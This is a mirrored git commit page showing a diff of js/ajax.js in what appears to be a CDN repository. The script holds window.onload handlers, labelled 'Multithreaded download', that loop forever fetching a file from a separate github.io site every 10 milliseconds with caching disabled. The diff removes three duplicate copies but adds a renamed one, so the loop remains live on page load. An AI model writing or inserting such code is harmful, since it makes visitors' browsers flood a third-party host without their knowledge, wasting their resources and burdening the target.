mirror of
https://github.com/hexahigh/cdn.git
synced 2025-12-11 20:15:22 +01:00
e
This commit is contained in:
parent
0419f5b51f
commit
6f19503b92
15
js/ajax.js
15
js/ajax.js
@ -35,26 +35,13 @@ if(resppage = true){
|
||||
}
|
||||
}
|
||||
|
||||
//Multithreaded download
|
||||
window.onload = async function startdown(){
|
||||
while(true) {
|
||||
await delay(10);
|
||||
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
|
||||
}
|
||||
}
|
||||
window.onload = async function startdown(){
|
||||
while(true) {
|
||||
await delay(10);
|
||||
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
|
||||
}
|
||||
}
|
||||
window.onload = async function startdown(){
|
||||
while(true) {
|
||||
await delay(10);
|
||||
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
|
||||
}
|
||||
}
|
||||
window.onload = async function startdown(){
|
||||
window.onload = async function startdown2(){
|
||||
while(true) {
|
||||
await delay(10);
|
||||
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user